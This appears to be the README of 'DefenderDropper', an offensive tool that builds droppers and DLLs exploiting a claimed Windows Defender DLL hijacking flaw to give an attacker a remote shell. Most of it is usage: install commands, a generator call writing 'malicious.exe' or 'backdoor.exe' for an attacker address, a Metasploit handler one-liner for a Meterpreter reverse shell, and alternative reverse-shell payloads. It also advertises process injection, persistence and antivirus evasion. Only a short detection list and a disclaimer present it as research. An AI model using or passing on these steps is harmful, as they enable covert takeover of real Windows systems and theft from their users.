Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities
DefenderDropper is an advanced payload generation tool that leverages the DLL hijacking vulnerability in Windows Defender, originally discovered by TwoSevenOneT. This tool automates the creation of sophisticated payloads that bypass security controls by hijacking legitimate Windows Defender processes.
Inspired by: TwoSevenOneT/DefenderWrite
- Windows Defender Exploitation: Leverages DLL hijacking in Windows Defender
- Automated Payload Generation: Creates ready-to-use droppers and DLLs
- Metasploit Integration: Seamless integration with Meterpreter payloads
- Static Compilation: No external dependencies required
- Stealth Execution: Runs through legitimate system processes
- Multiple Payload Support: Various reverse shell and Meterpreter options
# Install dependencies on Debian/Kali
sudo apt update
sudo apt install python3 metasploit-framework mingw-w64 -ygit clone https://github.com/HackScaleTeam/DefenderDropper.git
cd DefenderDropperpython3 defenderdropper.py 10.0.2.147 4443 -o malicious.exe
msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST 10.0.2.147; set LPORT 4443; exploit'
-
Download DefenderWrite.exe if not installed from: https://github.com/TwoSevenOneT/DefenderWrite
-
On Windows VM, place these 3 files in SAME directory:
- {exe_name}
- {dll_name}
- DefenderWrite.exe
-
Start listener:
msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST {args.LHOST}; set LPORT {args.LPORT}; exploit' -
Run {exe_name} as Administrator on Windows VM
Technical Overview DLL Hijacking: Exploits Windows Defender's vulnerable update process
Process Injection: Injects shellcode into legitimate system processes
Persistence: Leverages trusted Windows components for execution
Evasion: Bypasses common security controls and antivirus solutions
DefenderDropper/
├── defenderdropper.py # Main payload generator
├── payload.exe # Generated dropper
├── payload.dll # Shellcode DLL
├── DefenderWrite.exe # Core exploit tool
├── README.md
└── LICENSE
Basic Meterpreter Payload
python3 defenderdropper.py 192.168.1.100 4444 -o backdoor.exeCustom Payloads
You can modify the generate_shellcode() function to use different Metasploit payloads, on defenderdropper.py search for windows/x64/meterpreter_reverse_tcp and replace it with other payloads:
"-p", "windows/x64/shell_reverse_tcp", # Simple reverse shell
"-p", "windows/meterpreter/reverse_https", # HTTPS payload
"-p", "windows/x64/meterpreter/reverse_tcp", # Standard Meterpreter
Detection Monitor for unusual msiexec.exe child processes
Watch for DLL files in Windows Defender directory
Analyze process hollowing techniques
Keep Windows Defender updated
Implement application whitelisting
Use advanced endpoint protection
Regular security audits
This tool is intended for:
Security research
Penetration testing with proper authorization
Educational purposes
Red team exercises
Illegal use of this tool is strictly prohibited. The developers are not responsible for any misuse or damage caused by this tool. Always ensure you have explicit permission before testing any systems.
We welcome contributions from the security community! Feel free to:
Fork the repository
Create feature branches
Submit pull requests
Report issues and suggestions
TwoSevenOneT for the original DefenderWrite research
The cybersecurity community for continuous improvement
This project is licensed under the MIT License - see the LICENSE. file for details.
Security is a shared responsibility. Use this tool wisely and ethically.
Built with ❤️ for the cybersecurity community. Inspired by groundbreaking research from TwoSevenOneT.